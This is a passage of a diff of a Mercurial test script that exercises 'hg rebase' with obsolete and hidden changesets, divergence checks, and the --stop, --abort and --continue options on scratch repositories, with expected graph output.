0:cd010b8cd998 A - -(actual test) - - $ hg rebase --dest 6 --rev '((desc(H) + desc(D))::) - desc(M)' - rebasing 3:32af7686d403 "D" - rebasing 7:02de42196ebe "H" - rebasing 9:4bde274eefcf tip "I" - 1 new orphan changesets - $ hg log -G - @ 12:acd174b7ab39 I - | - o 11:6c11a6218c97 H - | - | o 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - -Test hidden changesets in the rebase set (issue4504) - - $ hg up --hidden 9 - 3 files updated, 0 files merged, 1 files removed, 0 files unresolved - updated to hidden changeset 4bde274eefcf - (hidden revision '4bde274eefcf' was rewritten as: acd174b7ab39) - $ echo J > J - $ hg add J - $ hg commit -m J - 1 new orphan changesets - $ hg debugobsolete `hg log --rev . -T '{node}'` - 1 new obsolescence markers - obsoleted 1 changesets - - $ hg rebase --rev .~1::. --dest 'max(desc(D))' --traceback --config experimental.rebaseskipobsolete=off - rebasing 9:4bde274eefcf "I" - rebasing 13:06edfc82198f tip "J" - 2 new content-divergent changesets - $ hg log -G - @ 15:5ae8a643467b J - | - * 14:9ad579b4a5de I - | - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg up 14 -C - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "K" > K - $ hg add K - $ hg commit --amend -m "K" - 1 new orphan changesets - $ echo "L" > L - $ hg add L - $ hg commit -m "L" - $ hg up '.^' - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo "M" > M - $ hg add M - $ hg commit --amend -m "M" - 1 new orphan changesets - $ hg log -G - @ 18:bfaedf8eb73b M - | - | * 17:97219452e4bd L - | | - | x 16:fc37a630c901 K (rewritten using amend as 18:bfaedf8eb73b) - |/ - | * 15:5ae8a643467b J - | | - | x 14:9ad579b4a5de I (rewritten using amend as 16:fc37a630c901) - |/ - | * 12:acd174b7ab39 I - | | - | o 11:6c11a6218c97 H - | | - o | 10:b5313c85b22e D - |/ - | * 8:53a6a128b2b7 M - | |\ - | | x 7:02de42196ebe H (rewritten using rebase as 11:6c11a6218c97) - | | | - o---+ 6:eea13746799a G - | | | - | | o 5:24b6387c8c8c F - | | | - o---+ 4:9520eea781bc E - / / - x | 3:32af7686d403 D (rewritten using rebase as 10:b5313c85b22e) - | | - o | 2:5fddd98957c8 C - | | - o | 1:42ccdea3bb16 B - |/ - o 0:cd010b8cd998 A - - $ hg rebase -s 14 -d 17 --config experimental.rebaseskipobsolete=True - note: not rebasing 14:9ad579b4a5de "I", already in destination as 16:fc37a630c901 "K" - rebasing 15:5ae8a643467b "J" - 1 new orphan changesets - - $ cd .. - Skip obsolete changeset even with multiple hops ----------------------------------------------- @@ -1043,1096 +317,3 @@ note: not rebasing 20:8b31da3c4919 "dummy change", already in destination as 18:601db7a18f51 "dummy change successor" rebasing 21:7bdc8a87673d tip "dummy change" $ cd .. - -Divergence cases due to obsolete changesets -------------------------------------------- - -We should ignore branches with unstable changesets when they are based on an -obsolete changeset which successor is in rebase set. - - $ hg init divergence - $ cd divergence - $ cat >> .hg/hgrc << EOF - > [extensions] - > strip = - > [alias] - > strip = strip --no-backup --quiet - > [templates] - > instabilities = '{rev}:{node|short} {desc|firstline}{if(instabilities," ({instabilities})")}\n' - > EOF - - $ hg debugdrawdag <<EOF - > e f - > | | - > d' d # replace: d -> d' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -Changeset d and its descendants are excluded to avoid divergence of d, which -would occur because the successor of d (d') is also in rebaseset. As a -consequence f (descendant of d) is left behind. - - $ hg rebase -b 'e' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:027ad6c5830d d' "d'" - rebasing 6:d60ebfa0f1cb e "e" - note: not rebasing 4:76be324c128b d "d" and its descendants as this would cause divergence - $ hg log -G -r 'a':: - o 11:eb6d63fc4ed5 e - | - o 10:44d8c724a70c d' - | - o 9:d008e6b4d3fd c - | - o 8:67e8f4a16c49 b - | - | * 7:1143e9adc121 f - | | - | | x 6:d60ebfa0f1cb e (rewritten using rebase as 11:eb6d63fc4ed5) - | | | - | | x 5:027ad6c5830d d' (rewritten using rebase as 10:44d8c724a70c) - | | | - | x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 9:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 8:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - $ hg log -G -r 'a':: - * 7:1143e9adc121 f - | - | o 6:d60ebfa0f1cb e - | | - | o 5:027ad6c5830d d' - | | - x | 4:76be324c128b d (rewritten using replace as 5:027ad6c5830d) - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - -If the rebase set has an obsolete (d) with a successor (d') outside the rebase -set and none in destination, we still get the divergence warning. -By allowing divergence, we can perform the rebase. - - $ hg rebase -r 'c'::'f' -d 'x' - abort: this rebase will cause divergences from: 76be324c128b - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - $ hg rebase --config experimental.evolution.allowdivergence=true -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - $ hg log -G -r 'a':: -T instabilities - o 10:e1744ea07510 f - | - * 9:e2b36ea9a0a0 d (content-divergent) - | - o 8:6a0376de376e c - | - | x 7:1143e9adc121 f - | | - | | * 6:d60ebfa0f1cb e (orphan) - | | | - | | * 5:027ad6c5830d d' (orphan content-divergent) - | | | - | x | 4:76be324c128b d - | |/ - | x 3:a82ac2b38757 c - | | - o | 2:630d7c95eff7 x - | | - | o 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg strip -r 8: - -(Not skipping obsoletes means that divergence is allowed.) - - $ hg rebase --config experimental.rebaseskipobsolete=false -r 'c'::'f' -d 'x' - rebasing 3:a82ac2b38757 c "c" - rebasing 4:76be324c128b d "d" - rebasing 7:1143e9adc121 f tip "f" - 1 new orphan changesets - 2 new content-divergent changesets - - $ hg strip -r 0: - -Similar test on a more complex graph - - $ hg debugdrawdag <<EOF - > g - > | - > f e - > | | - > e' d # replace: e -> e' - > \ / - > c - > | - > x b - > \| - > a - > EOF - 1 new orphan changesets - $ hg log -G -r 'a': - * 8:2876ce66c6eb g - | - | o 7:3ffec603ab53 f - | | - x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | - | o 5:63324dc512ea e' - | | - o | 4:76be324c128b d - |/ - o 3:a82ac2b38757 c - | - | o 2:630d7c95eff7 x - | | - o | 1:488e1b7e7341 b - |/ - o 0:b173517d0057 a - - $ hg rebase -b 'f' -d 'x' - rebasing 1:488e1b7e7341 b "b" - rebasing 3:a82ac2b38757 c "c" - rebasing 5:63324dc512ea e' "e'" - rebasing 7:3ffec603ab53 f "f" - rebasing 4:76be324c128b d "d" - note: not rebasing 6:e36fae928aec e "e" and its descendants as this would cause divergence - $ hg log -G -r 'a': - o 13:a1707a5b7c2c d - | - | o 12:ef6251596616 f - | | - | o 11:b6f172e64af9 e' - |/ - o 10:d008e6b4d3fd c - | - o 9:67e8f4a16c49 b - | - | * 8:2876ce66c6eb g - | | - | | x 7:3ffec603ab53 f (rewritten using rebase as 12:ef6251596616) - | | | - | x | 6:e36fae928aec e (rewritten using replace as 5:63324dc512ea) - | | | - | | x 5:63324dc512ea e' (rewritten using rebase as 11:b6f172e64af9) - | | | - | x | 4:76be324c128b d (rewritten using rebase as 13:a1707a5b7c2c) - | |/ - | x 3:a82ac2b38757 c (rewritten using rebase as 10:d008e6b4d3fd) - | | - o | 2:630d7c95eff7 x - | | - | x 1:488e1b7e7341 b (rewritten using rebase as 9:67e8f4a16c49) - |/ - o 0:b173517d0057 a - - -issue5782 - $ hg strip -r 0: - $ hg debugdrawdag <<EOF - > d - > | - > c1 c # replace: c -> c1 - > \ / - > b - > | - > a - > EOF - 1 new orphan changesets - $ hg debugobsolete `hg log -T "{node}" --hidden -r 'desc("c1")'` - 1 new obsolescence markers - obsoleted 1 changesets - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ hg rebase -d 0 -r 2 - note: not rebasing 2:a82ac2b38757 c "c", it has no successor - $ hg log -G -r 'a': --hidden - * 4:76be324c128b d - | - | x 3:ef8a456de8fa c1 (pruned) - | | - x | 2:a82ac2b38757 c (rewritten using replace as 3:ef8a456de8fa) - |/ - o 1:488e1b7e7341 b - | - o 0:b173517d0057 a - - $ cd .. - -Rebase merge where successor of one parent is equal to destination (issue5198) - - $ hg init p1-succ-is-dest - $ cd p1-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:50e9d60b99c6 F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:50e9d60b99c6) - | |/| - | o | 3:7fb047a69f22 E - | | | - | | x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o | 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is equal to destination - - $ hg init p2-succ-is-dest - $ cd p2-succ-is-dest - - $ hg debugdrawdag <<EOF - > F - > /| - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d B -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 4:66f1a38021c9 F tip "F" - $ hg log -G - o 5:aae1787dacee F - |\ - | | x 4:66f1a38021c9 F (rewritten using rebase as 5:aae1787dacee) - | |/| - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | o | 2:b18e25de2cf5 D - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest - $ cd p1-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s D - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - - $ hg log -G - o 6:0913febf6439 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:0913febf6439) - | | | - | o | 4:26805aba1e60 C - | | | - o | | 3:7fb047a69f22 E - | | | - +---x 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | | - | o 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest - $ cd p2-succ-in-dest - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -s E - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - $ hg log -G - o 6:c6ab0cc6d220 F - |\ - +---x 5:66f1a38021c9 F (rewritten using rebase as 6:c6ab0cc6d220) - | | | - | o | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - o---+ 2:b18e25de2cf5 D - / / - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of one parent is ancestor of destination - - $ hg init p1-succ-in-dest-b - $ cd p1-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: E -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - rebasing 2:b18e25de2cf5 D "D" - note: not rebasing 3:7fb047a69f22 E "E", already in destination as 1:112478962961 B "B" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - $ hg log -G - o 6:8f47515dda15 D - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using replace as 1:112478962961) - | | | - | x | 2:b18e25de2cf5 D (rewritten using rebase as 6:8f47515dda15) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where successor of other parent is ancestor of destination - - $ hg init p2-succ-in-dest-b - $ cd p2-succ-in-dest-b - - $ hg debugdrawdag <<EOF - > F C - > /| | - > E D B # replace: D -> B - > \|/ - > A - > EOF - 1 new orphan changesets - - $ hg rebase -d C -b F - note: not rebasing 2:b18e25de2cf5 D "D", already in destination as 1:112478962961 B "B" - rebasing 3:7fb047a69f22 E "E" - rebasing 5:66f1a38021c9 F tip "F" - note: not rebasing 5:66f1a38021c9 F tip "F", its destination already has all its changes - - $ hg log -G - o 6:533690786a86 E - | - | x 5:66f1a38021c9 F (pruned using rebase) - | |\ - o | | 4:26805aba1e60 C - | | | - | | x 3:7fb047a69f22 E (rewritten using rebase as 6:533690786a86) - | | | - | x | 2:b18e25de2cf5 D (rewritten using replace as 1:112478962961) - | |/ - o / 1:112478962961 B - |/ - o 0:426bada5c675 A - - $ cd .. - -Rebase merge where extinct node has successor that is not an ancestor of -destination - - $ hg init extinct-with-succ-not-in-dest - $ cd extinct-with-succ-not-in-dest - - $ hg debugdrawdag <<EOF - > E C # replace: C -> E - > | | - > D B - > |/ - > A - > EOF - - $ hg rebase -d D -s B - rebasing 1:112478962961 B "B" - note: not rebasing 3:26805aba1e60 C "C" and its descendants as this would cause divergence - - $ cd .. - - $ hg init p2-succ-in-dest-c - $ cd p2-succ-in-dest-c - -The scenario here was that B::D were developed on default. B was queued on -stable, but amended before being push to hg-committed. C was queued on default, -along with unrelated J. - - $ hg debugdrawdag <<EOF - > J - > | - > F - > | - > E - > | D - > | | - > | C # replace: C -> F - > | | H I # replace: B -> H -> I - > | B |/ - > |/ G - > A - > EOF - 1 new orphan changesets - -This strip seems to be the key to avoid an early divergence warning. - $ hg --config extensions.strip= --hidden strip -qr H - 1 new orphan changesets - - $ hg rebase -b 'desc("D")' -d 'desc("J")' - abort: this rebase will cause divergences from: 112478962961 - (to force the rebase please set experimental.evolution.allowdivergence=True) - [20] - -Rebase merge where both parents have successors in destination - - $ hg init p12-succ-in-dest - $ cd p12-succ-in-dest - $ hg debugdrawdag <<'EOS' - > E F - > /| /| # replace: A -> C - > A B C D # replace: B -> D - > | | - > X Y - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+E -d F - note: not rebasing 4:a3d17304151f A "A", already in destination as 0:96cc3511f894 C "C" - note: not rebasing 5:b23a2cc00842 B "B", already in destination as 1:058c1e1fb10a D "D" - rebasing 7:dac5d11c5a7d E tip "E" - abort: rebasing 7:dac5d11c5a7d will include unwanted changes from 3:59c792af609c, 5:b23a2cc00842 or 2:ba2b7fa7166d, 4:a3d17304151f - [10] - $ cd .. - -Rebase a non-clean merge. One parent has successor in destination, the other -parent moves as requested. - - $ hg init p1-succ-p2-move - $ cd p1-succ-p2-move - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: A -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r A+B+D -d Z - note: not rebasing 0:426bada5c675 A "A", already in destination as 2:96cc3511f894 C "C" - rebasing 1:fc2b737bb2e5 B "B" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:e4f78693cc88 D - | - o 5:76840d832e98 B - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - B - C - D - Z - - $ cd .. - - $ hg init p1-move-p2-succ - $ cd p1-move-p2-succ - $ hg debugdrawdag <<'EOS' - > D Z - > /| | # replace: B -> C - > A B C # D/D = D - > EOS - 1 new orphan changesets - $ hg rebase -r B+A+D -d Z - rebasing 0:426bada5c675 A "A" - note: not rebasing 1:fc2b737bb2e5 B "B", already in destination as 2:96cc3511f894 C "C" - rebasing 3:b8ed089c80ad D "D" - - $ rm .hg/localtags - $ hg log -G - o 6:1b355ed94d82 D - | - o 5:a81a74d764a6 A - | - o 4:50e41c1f3950 Z - | - o 2:96cc3511f894 C - - $ hg files -r tip - A - C - D - Z - - $ cd .. - -Test that bookmark is moved and working dir is updated when all changesets have -equivalents in destination - $ hg init rbsrepo && cd rbsrepo - $ echo "[experimental]" > .hg/hgrc - $ echo "evolution=true" >> .hg/hgrc - $ echo "rebaseskipobsolete=on" >> .hg/hgrc - $ echo root > root && hg ci -Am root - adding root - $ echo a > a && hg ci -Am a - adding a - $ hg up 0 - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ echo b > b && hg ci -Am b - adding b - created new head - $ hg rebase -r 2 -d 1 - rebasing 2:1e9a3c00cbe9 tip "b" - $ hg log -r . # working dir is at rev 3 (successor of 2) - 3:be1832deae9a b (no-eol) - $ hg book -r 2 mybook --hidden # rev 2 has a bookmark on it now - bookmarking hidden changeset 1e9a3c00cbe9 - (hidden revision '1e9a3c00cbe9' was rewritten as: be1832deae9a) - $ hg up 2 && hg log -r . # working dir is at rev 2 again - 0 files updated, 0 files merged, 1 files removed, 0 files unresolved - 2:1e9a3c00cbe9 b (rewritten using rebase as 3:be1832deae9a) (no-eol) - $ hg rebase -r 2 -d 3 --config experimental.evolution.track-operation=1 - note: not rebasing 2:1e9a3c00cbe9 mybook "b", already in destination as 3:be1832deae9a tip "b" -Check that working directory and bookmark was updated to rev 3 although rev 2 -was skipped - $ hg log -r . - 3:be1832deae9a b (no-eol) - $ hg bookmarks - mybook 3:be1832deae9a - $ hg debugobsolete --rev tip - 1e9a3c00cbe90d236ac05ef61efcc5e40b7412bc be1832deae9ac531caa7438b8dcf6055a122cd8e 0 (Thu Jan 01 00:00:00 1970 +0000) {'ef1': '4', 'operation': 'rebase', 'user': 'test'} - -Obsoleted working parent and bookmark could be moved if an ancestor of working -parent gets moved: - - $ hg init $TESTTMP/ancestor-wd-move - $ cd $TESTTMP/ancestor-wd-move - $ hg debugdrawdag <<'EOS' - > E D1 # rebase: D1 -> D2 - > | | - > | C - > D2 | - > | B - > |/ - > A - > EOS - $ hg update D1 -q - $ hg bookmark book -i - $ hg rebase -r B+D1 -d E - rebasing 1:112478962961 B "B" - note: not rebasing 5:15ecf15e0114 book D1 tip "D1", already in destination as 2:0807738e0be9 D2 "D2" - 1 new orphan changesets - $ hg log -G -T '{desc} {bookmarks}' - @ B book - | - | x D1 - | | - o | E - | | - | * C - | | - o | D2 - | | - | x B - |/ - o A - -Rebasing a merge with one of its parent having a hidden successor - - $ hg init $TESTTMP/merge-p1-hidden-successor - $ cd $TESTTMP/merge-p1-hidden-successor - - $ hg debugdrawdag <<'EOS' - > E - > | - > B3 B2 # amend: B1 -> B2 -> B3 - > |/ # B2 is hidden - > | D - > | |\ - > | B1 C - > |/ - > A - > EOS - 1 new orphan changesets - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg rebase -r $D -d $E - rebasing 5:9e62094e4d94 "D" - - $ hg log -G - o 7:a699d059adcf D - |\ - | o 6:ecc93090a95c E - | | - | o 4:0dc878468a23 B3 - | | - o | 1:96cc3511f894 C - / - o 0:426bada5c675 A - -For some reasons (--hidden, rebaseskipobsolete=0, directaccess, etc.), -rebasestate may contain hidden hashes. "rebase --abort" should work regardless. - - $ hg init $TESTTMP/hidden-state1 - $ cd $TESTTMP/hidden-state1 - $ cat >> .hg/hgrc <<EOF - > [experimental] - > rebaseskipobsolete=0 - > EOF - - $ hg debugdrawdag <<'EOS' - > C - > | - > D B # prune: B, C - > |/ # B/D=B - > A - > EOS - - $ eval `hg tags -T '{tag}={node}\n'` - $ rm .hg/localtags - - $ hg update -q $C --hidden - updated to hidden changeset 7829726be4dc - (hidden revision '7829726be4dc' is pruned) - $ hg rebase -s $B -d $D - rebasing 1:2ec65233581b "B" - merging D - warning: conflicts while merging D! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - - $ cp -R . $TESTTMP/hidden-state2 - - $ hg log -G - @ 2:b18e25de2cf5 D - | - | % 1:2ec65233581b B (pruned using prune) - |/ - o 0:426bada5c675 A - - $ hg summary - parent: 2:b18e25de2cf5 tip - D - branch: default - commit: 1 modified, 1 added, 1 unknown, 1 unresolved - update: 1 new changesets, 2 branch heads (merge) - phases: 3 draft - rebase: 0 rebased, 2 remaining (rebase --continue) - - $ hg rebase --abort - rebase aborted - -Also test --continue for the above case - - $ cd $TESTTMP/hidden-state2 - $ hg resolve -m - (no more unresolved files) - continue: hg rebase --continue - $ hg rebase --continue - rebasing 1:2ec65233581b "B" - rebasing 3:7829726be4dc tip "C" - $ hg log -G - @ 5:1964d5d5b547 C - | - o 4:68deb90c12a2 B - | - o 2:b18e25de2cf5 D - | - o 0:426bada5c675 A - -==================== -Test --stop option | -==================== - $ cd .. - $ hg init rbstop - $ cd rbstop - $ echo a>a - $ hg ci -Aqma - $ echo b>b - $ hg ci -Aqmb - $ echo c>c - $ hg ci -Aqmc - $ echo d>d - $ hg ci -Aqmd - $ hg up 0 -q - $ echo f>f - $ hg ci -Aqmf - $ echo D>d - $ hg ci -Aqm "conflict with d" - $ hg up 3 -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | x 2:177f92b77385 test - | | c - | | - | x 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test it aborts if unstable csets is not allowed: -=============================================== - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=False - > EOF - - $ hg strip 6 --no-backup -q - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot remove original changesets with unrebased descendants - (either enable obsmarkers to allow unstable revisions or use --keep to keep original changesets) - [20] - $ hg rebase --abort - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - rebase aborted - -Test --stop when --keep is passed: -================================== - $ hg rebase -s 1 -d 5 --keep - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 7:7fffad344617 test - | c - | - o 6:b15528633407 test - | b - | - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop aborts when --collapse was passed: -============================================= - $ cat >> $HGRCPATH << EOF - > [experimental] - > evolution.allowunstable=True - > EOF - - $ hg strip 6 - saved backup bundle to $TESTTMP/rbstop/.hg/strip-backup/b15528633407-6eb72b6f-backup.hg - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - - $ hg rebase -s 1 -d 5 --collapse -m "collapsed b c d" - rebasing 1:d2ae7f538514 "b" - rebasing 2:177f92b77385 "c" - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - abort: cannot stop in --collapse session - [20] - $ hg rebase --abort - rebase aborted - $ hg diff - $ hg log -G --template "{rev}:{short(node)} {person(author)}\n{firstline(desc)} {topic}\n\n" - o 5:00bfc9898aeb test - | conflict with d - | - o 4:dafd40200f93 test - | f - | - | @ 3:055a42cdd887 test - | | d - | | - | o 2:177f92b77385 test - | | c - | | - | o 1:d2ae7f538514 test - |/ b - | - o 0:cb9a9f314b8b test - a - -Test --stop raise errors with conflicting options: -================================================= - $ hg rebase -s 3 -d 5 - rebasing 3:055a42cdd887 "d" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop --dry-run - abort: cannot specify both --stop and --dry-run - [10] - - $ hg rebase -s 3 -d 5 - abort: rebase in progress - (use 'hg rebase --continue', 'hg rebase --abort', or 'hg rebase --stop') - [20] - $ hg rebase --stop --continue - abort: cannot specify both --stop and --continue - [10] - -Test --stop moves bookmarks of original revisions to new rebased nodes: -====================================================================== - $ cd .. - $ hg init repo - $ cd repo - - $ echo a > a - $ hg ci -Am A - adding a - - $ echo b > b - $ hg ci -Am B - adding b - $ hg book X - $ hg book Y - - $ echo c > c - $ hg ci -Am C - adding c - $ hg book Z - - $ echo d > d - $ hg ci -Am D - adding d - - $ hg up 0 -q - $ echo e > e - $ hg ci -Am E - adding e - created new head - - $ echo doubt > d - $ hg ci -Am "conflict with d" - adding d - - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | o 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | o 2: 49cb3485fa0c 'C' bookmarks: Y - | | - | o 1: 6c81ed0049f8 'B' bookmarks: X - |/ - o 0: 1994f17a630e 'A' bookmarks: - - $ hg rebase -s 1 -d 5 - rebasing 1:6c81ed0049f8 X "B" - rebasing 2:49cb3485fa0c Y "C" - rebasing 3:67a385d4e6f2 Z "D" - merging d - warning: conflicts while merging d! (edit, then use 'hg resolve --mark') - unresolved conflicts (see 'hg resolve', then 'hg rebase --continue') - [240] - $ hg rebase --stop - 1 new orphan changesets - $ hg log -GT "{rev}: {node|short} '{desc}' bookmarks: {bookmarks}\n" - o 7: 9c86c650b686 'C' bookmarks: Y - | - o 6: 9b87b54e5fd8 'B' bookmarks: X - | - @ 5: 39adf30bc1be 'conflict with d' bookmarks: - | - o 4: 9c1e55f411b6 'E' bookmarks: - | - | * 3: 67a385d4e6f2 'D' bookmarks: Z - | | - | x 2: 49cb3485fa0c 'C' bookmarks: - | | - | x 1: 6c81ed0049f8 'B' bookmarks: - |/ - o 0: 1994f17a630e 'A' bookmarks: - diff --git a/tests/test-rebase-obsolete.t b/tests/test-rebase-obsolete3.t copy from 